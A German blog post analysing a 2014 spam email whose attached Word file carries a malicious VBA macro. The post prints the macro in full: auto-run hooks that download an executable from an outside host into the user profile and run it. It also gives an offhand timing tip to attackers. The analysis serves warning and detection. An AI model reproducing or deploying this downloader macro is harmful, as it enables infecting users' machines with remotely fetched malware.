SPAM / Trojaner: Setzen Sie bitte mit uns in Verbindung

Warnung Betrug
Word Makro Viren oder Trojaner habe ich schon lange nicht mehr gesehen – ihnen allerdings auch keine große Beachtung geschenkt. Heute haben kam folgende Mail in den Briefkasten:

E-Mail-Text

Die E-Mail ist sehr einfach gehalten und in schwachem Deutsch geschrieben; aber wer erwartet heute noch gutes Deutsch in einer Mail oder kann es gar erkennen. Außerdem fehlt es an jedem Hinweis auf den Rechnungssteller (Firmenname, …), einem Impressum, Disclaimer, Angstklausel oder ähnlichem, wie er für geschäftliche Mails vorgeschrieben ist. Auch fehlt der To-Adressat, was bei Rechnungen nicht üblich ist. Hier nun der Text:

Reply-To: „Bona“ <m.depino@comcast.net>
From: „Bona“ <andie@pop3.strato.de>
Subject: Setzen Sie bitte mit uns in Verbindung.
Date: Tue, 10 Jun 2014 13:14:29 +0400
Hallo.

Wir informieren Sie , dass die Transaktion erfolgreich abgeschlossen ist, folgen Sie bitte dem untenstehenden Link und Sie können die Zahlungsquittung erhalten.

Tel: +49 (0) 89 668928471Rechnung.doc

Die Telefonnummer scheint es nicht zu geben.

Das Word-Dokument

Der Text des Word_Dokumentes lautet ganz einfach nur:

On the Edit menu, click Select ALL (or press Ctrl+A),
and then the complete the formatting of this document.

Der Angreifer gibt sich keine Mühe, seinen Angriff durch einen wie immer gearteten Text zu tarnen.

VBA Code

SpamAssassin hat diese E-Mail sehr eindeutig als Spam klassifiziert; meinen Virenscanner hat sie jedoch klaglos passiert, obwohl die Datei Rechnung.doc folgenden Visual Basic Code – mit LibreOffice geöffnet, extrahiert und um ein paar Leerzeilen ergänzt – enthält:

Rem Attribute VBA_ModuleType=VBADocumentModule
Option VBASupport 1

Sub Auto_Open()
YVFDXNTOHWT
End Sub

Sub AutoOpen()
    Auto_Open
End Sub

Sub Workbook_Open()
    Auto_Open
End Sub

Function GRPGFHKOSHI(ByVal SVBUWHUNJWT As String, ByVal CMYATDWOVAO As String) As Boolean
     Dim TPOORILDSDL As Object, VGNOIZXJPBH As Long, MOCHEOHRDMH As Long, EBLGIQMBFDP() As Byte

    Set TPOORILDSDL = CreateObject("Microsoft.XmlHttp")
    TPOORILDSDL.Open "GET", SVBUWHUNJWT, False
    TPOORILDSDL.Send ""

    Do While TPOORILDSDL.readyState <> 4
    DoEvents
    Loop

    EBLGIQMBFDP = TPOORILDSDL.responseBody

    MOCHEOHRDMH = FreeFile
    If Dir(CMYATDWOVAO) <> "" Then Kill CMYATDWOVAO
    Open CMYATDWOVAO For Binary As #MOCHEOHRDMH
    Put #MOCHEOHRDMH, , EBLGIQMBFDP
    Close #MOCHEOHRDMH
    
    Dim RRSNFVXRLLM
    RRSNFVXRLLM = Shell(CMYATDWOVAO, 1)

    Set TPOORILDSDL = Nothing
     
End Function

Sub YVFDXNTOHWT()
    GRPGFHKOSHI "http://small4busy.com/doc.exe", Environ("USERPROFILE") & "\useradmin.exe"
End Sub

In diesem Fall wird die Datei http://small4busy.com/doc.exe heruntergeladen und im <USERPROFILE>\useradmin.exe gespeichert und ausgeführt. Problematisch ist, dass die Virenscanner diese Datei teilweise nicht als Schadsoftware erkennen. Wer so leichtsinnig war, die Datei zu öffnen und die Ausführung von Makros erlaubt hat, sollte nach einer Datei „useradmin.exe“ suchen.

Der Programmierer verzichtet auf das obligatorischen „On Error Resume Next“ und löscht am Ende sogar die Objektvariable mit „Set … = Nothing“ – nicht ganz selbstverständlich heutzutage. Ansonsten ist der Code sehr einfach gehalten. Er verbreitet sich nicht in weiteren Word Dokumenten und prüft auch nicht, ob der Rechner bereits infiziert ist.

Für mich ist dies ein willkommenes Beispielmakro für ein Microsoft.XmlHttp-Objekt. Nach diesem Objekt war ich schon länger auf der – nicht sonderlich intensiven – Suche; natürlich für eine legale Verwendung. Jetzt kann ich mir die Suchen sparen.

Erkennung als Schadsoftware

Um 2014-06-10 07:53:45 UTC wurde die Datei doc.ex / userdamin.exe erstmalig bei VirusTotal ananlysiert. Zur Zeit 2014-06-10 19:38:38 UTC, ungefärh zwölf Stunden später, wird der Trojaner nur von 8 aus 50 Virenscannern als Schadsoftware erkannt.

AntiVir TR/Crypt.ZPACK.71927
ESET-NOD32 Win32/Tinba.AW
Kaspersky Trojan-Ransom.Win32.Foreign.kwms
Malwarebytes Spyware.Zbot.VXGen
Sophos Troj/DwnLdr-LQM
Tencent Win32.Trojan.Foreign.Eano
TrendMicro TROJ_INJECT.YYLD
TrendMicro-HouseCall TROJ_INJECT.YYLD

Dies lehrt uns, dass ein Virenscanner uns nicht sicher schützt und den Angreifern einige Stunden bleiben, um Rechner zu infizieren. Die drei Mails, die ich erhalten habe, haben einen Zeitstempel von 09:14 UTC. Als Angreifer würde ich die Mails erst spät am Nachmittag verschicken, dann wäre gegen Abend die Erkennungsrate noch geringer – nur so als Tipp. Unter diesen Umständen halte ich Vorsicht für die beste Schutzmaßnahme.

Gute Nacht

2 Gedanken zu „SPAM / Trojaner: Setzen Sie bitte mit uns in Verbindung“

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.